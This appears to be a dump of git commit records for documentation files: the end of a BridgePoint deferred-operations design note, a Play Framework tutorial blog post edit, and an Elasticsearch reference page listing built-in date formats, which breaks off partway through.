in the project directory. +\nVerify that it builds cleanly with no errors (no \"FAIL\" tests). +\n6.2.2 Run the project by running `bash run.sh` in the project directory. Confirm\nthat all tests pass. +\n6.2.3 Uncomment lines 44 and 45 in `init`. Build and run again. Confirm that an\nerror is thrown and the program exits. The error should look something like the\nfollowing: +\n```\nNo subtype selected\nio.ciera.runtime.summit.exceptions.XtumlException: No subtype selected\n...\n```\n\n== 7 User Documentation\n\nEntries were added in the BridgePoint CME documentation for \"Make Deferred...\"\nand \"Make Local\".\n\n== 8 Code Changes\n\n- fork\/repository: leviathan747\/bridgepoint +\n- branch: 11841_deferred_ops +\n\n----\n doc-bridgepoint\/notes\/10129_deferred_ops\/10129_deferred_ops_ant.md | 232 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n doc-bridgepoint\/notes\/10129_deferred_ops\/model.png | Bin 0 -> 342704 bytes\n doc-bridgepoint\/notes\/10129_deferred_ops\/op.png | Bin 0 -> 408085 bytes\n doc-bridgepoint\/notes\/10129_deferred_ops\/paper_model.jpg | Bin 0 -> 2849802 bytes\n doc-bridgepoint\/notes\/11841_deferred_ops.adoc | 139 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/MC-Java\/enums.inc | 2 +-\n src\/MC-Java\/ooa_schema.sql | 7 +++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Functions\/Context Menu Entry Functions\/Context Menu Entry Functions.xtuml | 38 ++++++++++++++++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Subsystem\/Deferral\/Deferral.xtuml | 180 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Subsystem\/Operation\/Operation.xtuml | 101 +++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Subsystem\/Subsystem.xtuml | 406 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/sql\/context_menu.pei.sql | 4 ++\n src\/org.xtuml.bp.core\/sql\/ooaofooa_hierarchy.pei.sql | 3 ++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/inspector\/.gitignore | 1 +\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/.gitignore | 4 
++\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/BridgePointContextMenuTools.html | 8 ++++\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/BridgePointContextMenuTools.md | 2 +\n src\/org.xtuml.bp.io.mdl\/sql\/file_io.pei.sql | 3 +-\n src\/org.xtuml.bp.io.mdl\/sql\/stream.pei.sql | 3 +-\n 19 files changed, 1130 insertions(+), 3 deletions(-)\n----\n\n== 9 Document References\n\n. [[dr-1]] link:10129_deferred_ops\/10129_deferred_ops_ant.md[Deferred operations analysis note]\n. [[dr-2]] https:\/\/github.com\/xtuml\/ciera\/[Ciera project homepage]\n. [[dr-3]] https:\/\/support.onefact.net\/issues\/11841[Support deferred operations in BridgePoint (part 1)]\n. [[dr-4]] https:\/\/support.onefact.net\/issues\/10298[MC-Java generated enumerator values do not start from 0]\n\n---\n\nThis work is licensed under the Creative Commons CC0 License\n\n---\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4f535591d3ea459e138ca14322306a124b4e8a96","subject":"Update 2016-10-03-Play-Framework-Beginner-Tutorial-Make-a-post-request-and-save-the-form-data-in-Mongodb.adoc","message":"Update 2016-10-03-Play-Framework-Beginner-Tutorial-Make-a-post-request-and-save-the-form-data-in-Mongodb.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-10-03-Play-Framework-Beginner-Tutorial-Make-a-post-request-and-save-the-form-data-in-Mongodb.adoc","new_file":"_posts\/2016-10-03-Play-Framework-Beginner-Tutorial-Make-a-post-request-and-save-the-form-data-in-Mongodb.adoc","new_contents":"= Play Framework - Beginner Tutorial : Make a post request and save the form data in Mongodb\n:published_at: 2016-10-03\n:hp-tags: play\n\n== Before the tutorial\n\nYou should : - read - https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaActions[Play Documentation : ScalaActions] - https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaForms[Play Documentation : ScalaForms] - https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaForms[Play Documentation : ScalaJsonAutomated] - have basic understanding of scala future transformation (map, flatMap) - have basic understanding of scala implicits - https:\/\/github.com\/harrylaou\/play2.5-skeleton-compileDI[clone play2.5-skeleton-compileDI]. \n\nThis example uses https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaCompileTimeDependencyInjection[compile-time dependency injection]. You can use https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaDependencyInjection[run-time DI] if you feel confident about it. - download and install https:\/\/www.mongodb.com\/download-center?jmp=homepage#community[mongodb] (brew install mongo for mac or check the video) - download and install http:\/\/3t.io\/mongochef\/[mongochef]\n\n== Tutorial \nvideo::iPKaW1RuTI[youtube]\n\n\n== After the tutorial\n\nYou should be able to : - create a compile-time DI play project - create a form in a play template - understand that a simple post in play requires two endpoints. 
- one to serve the form - one to handle the post request - create a model class - map a play Form to a case class - mapping - save a case class in Mongo DB\n\nPlay2-reactivemongo documentation\n\nBe careful: we are using the *play2-reactivemongo* plugin and not the *reactivemongo* driver.\n\n== Bonus\n\nDo you know the difference between Action and Action.async?\nFind out how to return pages with different result statuses.\nCheck:\n\n* https:\/\/www.playframework.com\/documentation\/2.5.x\/api\/scala\/index.html#play.api.mvc.Results[Play Results documentation]\n* https:\/\/www.playframework.com\/documentation\/2.5.x\/api\/scala\/index.html#play.api.mvc.Results[Play JSON basics]\n* https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaJsonHttp[Play JSON with HTTP]\n* http:\/\/PlayJSONReads\/Writes\/FormatCombinators[Play JSON Reads\/Writes\/Format Combinators]\n\n\n","old_contents":"= Play Framework - Beginner Tutorial : Make a post request and save the form data in Mongodb\n:published_at: 2016-10-03\n:hp-tags: play\n\n== Before the tutorial\n\nYou should : - read - https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaActions[Play Documentation : ScalaActions] - https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaForms[Play Documentation : ScalaForms] - https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaForms[Play Documentation : ScalaJsonAutomated] - have basic understanding of scala future transformation (map, flatMap) - have basic understanding of scala implicits - https:\/\/github.com\/harrylaou\/play2.5-skeleton-compileDI[clone play2.5-skeleton-compileDI]. \n\nThis example uses https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaCompileTimeDependencyInjection[compile-time dependency injection]. You can use https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaDependencyInjection[run-time DI] if you feel confident about it. - download and install https:\/\/www.mongodb.com\/download-center?jmp=homepage#community[mongodb] (brew install mongo for mac or check the video) - download and install http:\/\/3t.io\/mongochef\/[mongochef]\n\n== Tutorial \n\nvideo::iPKaW1RuTI[youtube]\n\n\n== After the tutorial\n\nYou should be able to : - create a compile-time DI play project - create a form in a play template - understand that a simple post in play requires two endpoints. 
- one to serve the form - one to handle the post request - create a model class - map a play Form to a case class - mapping - save a case class in Mongo DB\n\nPlay2-reactivemongo documentation\n\nBe careful: we are using *play2-reactivemongo* plugin and not *reactivemongo* driver\n\n== Bonus\n\nDo you know the difference between Action and Action.async ?\nFind out how to return different result statuses pages.\ncheck\n\n* https:\/\/www.playframework.com\/documentation\/2.5.x\/api\/scala\/index.html#play.api.mvc.Results[Play Results documentation]\n* https:\/\/www.playframework.com\/documentation\/2.5.x\/api\/scala\/index.html#play.api.mvc.Results[Play JSON basics]\n* https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaJsonHttp[Play JSON with HTTP]\n* http:\/\/PlayJSONReads\/Writes\/FormatCombinators[Play JSON Reads\/Writes\/Format Combinators]\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"6a8bad8a06aeebf4acaf2db0270e02b2939237d5","subject":"[DOCS] Document all date formats (#21164)","message":"[DOCS] Document all date formats (#21164)\n\nResolves #21046","repos":"uschindler\/elasticsearch,Helen-Zhao\/elasticsearch,nilabhsagar\/elasticsearch,henakamaMSFT\/elasticsearch,nezirus\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,coding0011\/elasticsearch,shreejay\/elasticsearch,JervyShi\/elasticsearch,JervyShi\/elasticsearch,markwalkom\/elasticsearch,rlugojr\/elasticsearch,obourgain\/elasticsearch,jimczi\/elasticsearch,bawse\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,nilabhsagar\/elasticsearch,i-am-Nathan\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,JSCooke\/elasticsearch,vroyer\/elasticassandra,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,C-Bish\/elasticsearch,winstonewert\/elasticsearch,fernandozhu\/elasticsearch,wangtuo\/elasticsearch,nazarewk\/elasticsearch,elasticdog\/elasticsearch,Stacey-Gammon\/elasticsearch,a2lin\/elasticsearch,lks21c\/elasticsearch,HonzaKral\/elasticsearch,JervyShi\/elasticsearch,fforbeck\/elasticsearch,StefanGor\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,jimczi\/elasticsearch,wenpos\/elasticsearch,MisterAndersen\/elasticsearch,rajanm\/elasticsearch,geidies\/elasticsearch,vroyer\/elassandra,qwerty4030\/elasticsearch,shreejay\/elasticsearch,mikemccand\/elasticsearch,scottsom\/elasticsearch,wuranbo\/elasticsearch,shreejay\/elasticsearch,jprante\/elasticsearch,artnowo\/elasticsearch,fforbeck\/elasticsearch,rlugojr\/elasticsearch,henakamaMSFT\/elasticsearch,nknize\/elasticsearch,i-am-Nathan\/elasticsearch,Shepard1212\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,lks21c\/elasticsearch,spiegela\/elasticsearch,wuranbo\/elasticsearch,alexshadow007\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,uschindler\/elasticsearch,bawse\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,naveenhooda2000\/elasticsearch,brandonkearby\/elasticsearch,masaruh\/elasticsearch,fred84\/elasticsearch,StefanGor\/elasticsearch,markwalkom\/elasticsearch,njlawton\/elasticsearch,gingerwizard\/elasticsearch,yanjunh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kalimatas\/elasticsearch,robin13\/elasticsearch,njlawton\/elasticsearch,sneivandt\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,henakamaMSFT\/elasticsearch,IanvsPoplicola\/elasticsear
ch,strapdata\/elassandra,ZTE-PaaS\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,JackyMai\/elasticsearch,fernandozhu\/elasticsearch,IanvsPoplicola\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,alexshadow007\/elasticsearch,fernandozhu\/elasticsearch,JackyMai\/elasticsearch,gfyoung\/elasticsearch,fernandozhu\/elasticsearch,Helen-Zhao\/elasticsearch,mortonsykes\/elasticsearch,pozhidaevak\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,C-Bish\/elasticsearch,nazarewk\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,Shepard1212\/elasticsearch,wenpos\/elasticsearch,mohit\/elasticsearch,mikemccand\/elasticsearch,MisterAndersen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,glefloch\/elasticsearch,elasticdog\/elasticsearch,Shepard1212\/elasticsearch,jimczi\/elasticsearch,wuranbo\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elassandra,masaruh\/elasticsearch,nazarewk\/elasticsearch,MisterAndersen\/elasticsearch,scottsom\/elasticsearch,alexshadow007\/elasticsearch,ZTE-PaaS\/elasticsearch,obourgain\/elasticsearch,C-Bish\/elasticsearch,mikemccand\/elasticsearch,lks21c\/elasticsearch,nknize\/elasticsearch,henakamaMSFT\/elasticsearch,elasticdog\/elasticsearch,naveenhooda2000\/elasticsearch,artnowo\/elasticsearch,umeshdangat\/elasticsearch,fforbeck\/elasticsearch,wenpos\/elasticsearch,i-am-Nathan\/elasticsearch,coding0011\/elasticsearch,njlawton\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,markwalkom\/elasticsearch,JervyShi\/elasticsearch,gfyoung\/elasticsearch,IanvsPoplicola\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,lks21c\/elasticsearch,winstonewert\/elasticsearch,mortonsykes\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,JSCooke\/elasticsearch,glefloch\/elasticsearch,MaineC\/elasticsearch,spiegela\/elasticsearch,henakamaMSFT\/elasticsearch,i-am-Nathan\/elasticsearch,mortonsykes\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,artnowo\/elasticsearch,Shepard1212\/elasticsearch,rlugojr\/elasticsearch,glefloch\/elasticsearch,masaruh\/elasticsearch,fernandozhu\/elasticsearch,rajanm\/elasticsearch,njlawton\/elasticsearch,rajanm\/elasticsearch,JSCooke\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,bawse\/elasticsearch,winstonewert\/elasticsearch,Helen-Zhao\/elasticsearch,MaineC\/elasticsearch,qwerty4030\/elasticsearch,strapdata\/elassandra,elasticdog\/elasticsearch,MaineC\/elasticsearch,nazarewk\/elasticsearch,pozhidaevak\/elasticsearch,maddin2016\/elasticsearch,LewayneNaidoo\/elasticsearch,a2lin\/elasticsearch,ZTE-PaaS\/elasticsearch,Helen-Zhao\/elasticsearch,StefanGor\/elasticsearch,bawse\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,elasticdog\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,yanjunh\/elasticsearch,IanvsPoplicola\/elasticsearch,spiegela\/elasticsearch,HonzaKral\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,robin13\/elasticsearch,brandonkearby\/elasticsearch,LeoYao\/elasticsearc
h,geidies\/elasticsearch,jprante\/elasticsearch,ZTE-PaaS\/elasticsearch,s1monw\/elasticsearch,geidies\/elasticsearch,scorpionvicky\/elasticsearch,JackyMai\/elasticsearch,nilabhsagar\/elasticsearch,obourgain\/elasticsearch,a2lin\/elasticsearch,MisterAndersen\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,scottsom\/elasticsearch,Shepard1212\/elasticsearch,LewayneNaidoo\/elasticsearch,vroyer\/elassandra,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,yanjunh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,spiegela\/elasticsearch,mohit\/elasticsearch,yanjunh\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,yanjunh\/elasticsearch,winstonewert\/elasticsearch,uschindler\/elasticsearch,JSCooke\/elasticsearch,nazarewk\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,a2lin\/elasticsearch,mohit\/elasticsearch,naveenhooda2000\/elasticsearch,LewayneNaidoo\/elasticsearch,C-Bish\/elasticsearch,jprante\/elasticsearch,mjason3\/elasticsearch,artnowo\/elasticsearch,obourgain\/elasticsearch,JackyMai\/elasticsearch,vroyer\/elasticassandra,brandonkearby\/elasticsearch,pozhidaevak\/elasticsearch,mjason3\/elasticsearch,artnowo\/elasticsearch,JervyShi\/elasticsearch,LeoYao\/elasticsearch,i-am-Nathan\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,JSCooke\/elasticsearch,glefloch\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,nknize\/elasticsearch,fforbeck\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,fforbeck\/elasticsearch,umeshdangat\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,MaineC\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,geidies\/elasticsearch,wenpos\/elasticsearch,winstonewert\/elasticsearch,geidies\/elasticsearch,JervyShi\/elasticsearch,wenpos\/elasticsearch,mortonsykes\/elasticsearch,rajanm\/elasticsearch,a2lin\/elasticsearch,GlenRSmith\/elasticsearch,nilabhsagar\/elasticsearch,wuranbo\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,fred84\/elasticsearch,njlawton\/elasticsearch,StefanGor\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,rlugojr\/elasticsearch,MaineC\/elasticsearch,mikemccand\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,MisterAndersen\/elasticsearch,nilabhsagar\/elasticsearch,bawse\/elasticsearch,JackyMai\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/elasticsearch,LewayneNaidoo\/elasticsearch,maddin2016\/elasticsearch,LewayneNaidoo\/elasticsearch,wuranbo\/elasticsearch,rlugojr\/elasticsearch,nknize\/elasticsearch,spiegela\/elasticsearch,StefanGor\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,alexshadow007\/elasticsearch,ZTE-PaaS\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch","old_file":"docs\/reference\/mapping\/params\/format.asciidoc","new_file":"docs\/reference\/mapping\/params\/format.asciidoc","new_contents":"[[mapping-date-format]]\n=== `format`\n\nIn JSON documents, dates are represented as strings. 
Elasticsearch uses a set\nof preconfigured formats to recognize and parse these strings into a long\nvalue representing _milliseconds-since-the-epoch_ in UTC.\n\nBesides the <<built-in-date-formats,built-in formats>>, your own\n<<custom-date-formats,custom formats>> can be specified using the familiar\n`yyyy\/MM\/dd` syntax:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\n{\n \"mappings\": {\n \"my_type\": {\n \"properties\": {\n \"date\": {\n \"type\": \"date\",\n \"format\": \"yyyy-MM-dd\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nMany APIs which support date values also support <<date-math,date math>>\nexpressions, such as `now-1m\/d` -- the current time, minus one month, rounded\ndown to the nearest day.\n\nTIP: The `format` setting must be the same for fields of the same\nname in the same index. Its value can be updated on existing fields using the\n<<indices-put-mapping,PUT mapping API>>.\n\n\n[[custom-date-formats]]\n==== Custom date formats\n\nCompletely customizable date formats are supported. The syntax for these is explained\nhttp:\/\/www.joda.org\/joda-time\/apidocs\/org\/joda\/time\/format\/DateTimeFormat.html[in the Joda docs].\n\n[[built-in-date-formats]]\n==== Built In Formats\n\nMost of the formats below have a `strict` companion format, which means that\nthe year, month, and day parts must have leading zeros in order\nto be valid. This means that a date like `5\/11\/1` would not be valid, but\nyou would need to specify the full date, which would be `2005\/11\/01` in this\nexample. So instead of `date_optional_time` you would need to specify\n`strict_date_optional_time`.\n\nThe following table lists all the default ISO formats supported:\n\n`epoch_millis`::\n\n A formatter for the number of milliseconds since the epoch. Note that\n this timestamp is subject to the limits of a Java `Long.MIN_VALUE` and\n `Long.MAX_VALUE`.\n\n`epoch_second`::\n\n A formatter for the number of seconds since the epoch. 
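For instance -- a brief sketch; the index name and sample value are\nillustrative, not taken from the original page:\n\n[source,js]\n--------------------------------------------------\nPUT my_index_seconds\n{\n \"mappings\": {\n \"my_type\": {\n \"properties\": {\n \"date\": {\n \"type\": \"date\",\n \"format\": \"epoch_second\"\n }\n }\n }\n }\n}\n\nPUT my_index_seconds\/my_type\/1\n{\n \"date\": 1420070400\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nHere `1420070400` is parsed as `2015-01-01T00:00:00Z`. 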
Note that this\n timestamp is subject to the limits of a Java `Long.MIN_VALUE` and `Long.\n MAX_VALUE` divided by 1000 (the number of milliseconds in a second).\n\n[[strict-date-time]]`date_optional_time` or `strict_date_optional_time`::\n\n A generic ISO datetime parser where the date is mandatory and the time is\n optional.\n http:\/\/www.joda.org\/joda-time\/apidocs\/org\/joda\/time\/format\/ISODateTimeFormat.html#dateOptionalTimeParser--[Full details here].\n\n`basic_date`::\n\n A basic formatter for a full date as four digit year, two digit month of\n year, and two digit day of month: `yyyyMMdd`.\n\n`basic_date_time`::\n\n A basic formatter that combines a basic date and time, separated by a 'T':\n `yyyyMMdd'T'HHmmss.SSSZ`.\n\n`basic_date_time_no_millis`::\n\n A basic formatter that combines a basic date and time without millis,\n separated by a 'T': `yyyyMMdd'T'HHmmssZ`.\n\n`basic_ordinal_date`::\n\n A formatter for a full ordinal date, using a four digit year and three\n digit dayOfYear: `yyyyDDD`.\n\n`basic_ordinal_date_time`::\n\n A formatter for a full ordinal date and time, using a four digit year and\n three digit dayOfYear: `yyyyDDD'T'HHmmss.SSSZ`.\n\n`basic_ordinal_date_time_no_millis`::\n\n A formatter for a full ordinal date and time without millis, using a four\n digit year and three digit dayOfYear: `yyyyDDD'T'HHmmssZ`.\n\n`basic_time`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, three digit millis, and time zone offset:\n `HHmmss.SSSZ`.\n\n`basic_time_no_millis`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, and time zone offset: `HHmmssZ`.\n\n`basic_t_time`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, three digit millis, and time zone offset\n prefixed by 'T': `'T'HHmmss.SSSZ`.\n\n`basic_t_time_no_millis`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, and time zone offset prefixed by 'T':\n `'T'HHmmssZ`.\n\n`basic_week_date` or `strict_basic_week_date`::\n\n A basic formatter for a full date as four digit weekyear, two digit week\n of weekyear, and one digit day of week: `xxxx'W'wwe`.\n\n`basic_week_date_time` or `strict_basic_week_date_time`::\n\n A basic formatter that combines a basic weekyear date and time, separated\n by a 'T': `xxxx'W'wwe'T'HHmmss.SSSZ`.\n\n`basic_week_date_time_no_millis` or `strict_basic_week_date_time_no_millis`::\n\n A basic formatter that combines a basic weekyear date and time without\n millis, separated by a 'T': `xxxx'W'wwe'T'HHmmssZ`.\n\n`date` or `strict_date`::\n\n A formatter for a full date as four digit year, two digit month of year,\n and two digit day of month: `yyyy-MM-dd`.\n\n`date_hour` or `strict_date_hour`::\n\n A formatter that combines a full date and two digit hour of day:\n `yyyy-MM-dd'T'HH`.\n\n`date_hour_minute` or `strict_date_hour_minute`::\n\n A formatter that combines a full date, two digit hour of day, and two\n digit minute of hour: `yyyy-MM-dd'T'HH:mm`.\n\n`date_hour_minute_second` or `strict_date_hour_minute_second`::\n\n A formatter that combines a full date, two digit hour of day, two digit\n minute of hour, and two digit second of minute: `yyyy-MM-dd'T'HH:mm:ss`.\n\n`date_hour_minute_second_fraction` or `strict_date_hour_minute_second_fraction`::\n\n A formatter that combines a full date, two digit hour of day, two digit\n minute of hour, two digit second of 
minute, and three digit fraction of\n second: `yyyy-MM-dd'T'HH:mm:ss.SSS`.\n\n`date_hour_minute_second_millis` or `strict_date_hour_minute_second_millis`::\n\n A formatter that combines a full date, two digit hour of day, two digit\n minute of hour, two digit second of minute, and three digit fraction of\n second: `yyyy-MM-dd'T'HH:mm:ss.SSS`.\n\n`date_time` or `strict_date_time`::\n\n A formatter that combines a full date and time, separated by a 'T': \n `yyyy-MM-dd'T'HH:mm:ss.SSSZZ`.\n\n`date_time_no_millis` or `strict_date_time_no_millis`::\n\n A formatter that combines a full date and time without millis, separated\n by a 'T': `yyyy-MM-dd'T'HH:mm:ssZZ`.\n\n`hour` or `strict_hour`::\n\n A formatter for a two digit hour of day: `HH`\n\n`hour_minute` or `strict_hour_minute`::\n\n A formatter for a two digit hour of day and two digit minute of hour:\n `HH:mm`.\n\n`hour_minute_second` or `strict_hour_minute_second`::\n\n A formatter for a two digit hour of day, two digit minute of hour, and two\n digit second of minute: `HH:mm:ss`.\n\n`hour_minute_second_fraction` or `strict_hour_minute_second_fraction`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and three digit fraction of second: `HH:mm:ss.SSS`.\n\n`hour_minute_second_millis` or `strict_hour_minute_second_millis`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and three digit fraction of second: `HH:mm:ss.SSS`.\n\n`ordinal_date` or `strict_ordinal_date`::\n\n A formatter for a full ordinal date, using a four digit year and three\n digit dayOfYear: `yyyy-DDD`.\n\n`ordinal_date_time` or `strict_ordinal_date_time`::\n\n A formatter for a full ordinal date and time, using a four digit year and\n three digit dayOfYear: `yyyy-DDD'T'HH:mm:ss.SSSZZ`.\n\n`ordinal_date_time_no_millis` or `strict_ordinal_date_time_no_millis`::\n\n A formatter for a full ordinal date and time without millis, using a four\n digit year and three digit dayOfYear: `yyyy-DDD'T'HH:mm:ssZZ`.\n\n`time` or `strict_time`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, three digit fraction of second, and time zone\n offset: `HH:mm:ss.SSSZZ`.\n\n`time_no_millis` or `strict_time_no_millis`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and time zone offset: `HH:mm:ssZZ`.\n\n`t_time` or `strict_t_time`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, three digit fraction of second, and time zone\n offset prefixed by 'T': `'T'HH:mm:ss.SSSZZ`.\n\n`t_time_no_millis` or `strict_t_time_no_millis`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and time zone offset prefixed by 'T': `'T'HH:mm:ssZZ`.\n\n`week_date` or `strict_week_date`::\n\n A formatter for a full date as four digit weekyear, two digit week of\n weekyear, and one digit day of week: `xxxx-'W'ww-e`.\n\n`week_date_time` or `strict_week_date_time`::\n\n A formatter that combines a full weekyear date and time, separated by a\n 'T': `xxxx-'W'ww-e'T'HH:mm:ss.SSSZZ`.\n\n`week_date_time_no_millis` or `strict_week_date_time_no_millis`::\n\n A formatter that combines a full weekyear date and time without millis,\n separated by a 'T': `xxxx-'W'ww-e'T'HH:mm:ssZZ`.\n\n`weekyear` or `strict_weekyear`::\n\n A formatter for a four digit weekyear: `xxxx`.\n\n`weekyear_week` or `strict_weekyear_week`::\n\n A 
formatter for a four digit weekyear and two digit week of weekyear:\n `xxxx-'W'ww`.\n\n`weekyear_week_day` or `strict_weekyear_week_day`::\n\n A formatter for a four digit weekyear, two digit week of weekyear, and one\n digit day of week: `xxxx-'W'ww-e`.\n\n`year` or `strict_year`::\n\n A formatter for a four digit year: `yyyy`.\n\n`year_month` or `strict_year_month`::\n\n A formatter for a four digit year and two digit month of year: `yyyy-MM`.\n\n`year_month_day` or `strict_year_month_day`::\n\n A formatter for a four digit year, two digit month of year, and two digit\n day of month: `yyyy-MM-dd`.\n\n","old_contents":"[[mapping-date-format]]\n=== `format`\n\nIn JSON documents, dates are represented as strings. Elasticsearch uses a set\nof preconfigured formats to recognize and parse these strings into a long\nvalue representing _milliseconds-since-the-epoch_ in UTC.\n\nBesides the <<built-in-date-formats,built-in formats>>, your own\n<<custom-date-formats,custom formats>> can be specified using the familiar\n`yyyy\/MM\/dd` syntax:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\n{\n \"mappings\": {\n \"my_type\": {\n \"properties\": {\n \"date\": {\n \"type\": \"date\",\n \"format\": \"yyyy-MM-dd\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nMany APIs which support date values also support <<date-math,date math>>\nexpressions, such as `now-1m\/d` -- the current time, minus one month, rounded\ndown to the nearest day.\n\nTIP: The `format` setting must have the same setting for fields of the same\nname in the same index. Its value can be updated on existing fields using the\n<<indices-put-mapping,PUT mapping API>>.\n\n\n[[custom-date-formats]]\n==== Custom date formats\n\nCompletely customizable date formats are supported. The syntax for these is explained\nhttp:\/\/www.joda.org\/joda-time\/apidocs\/org\/joda\/time\/format\/DateTimeFormat.html[in the Joda docs].\n\n[[built-in-date-formats]]\n==== Built In Formats\n\nMost of the below dates have a `strict` companion dates, which means, that\nyear, month and day parts of the week must have prepending zeros in order\nto be valid. This means, that a date like `5\/11\/1` would not be valid, but\nyou would need to specify the full date, which would be `2005\/11\/01` in this\nexample. So instead of `date_optional_time` you would need to 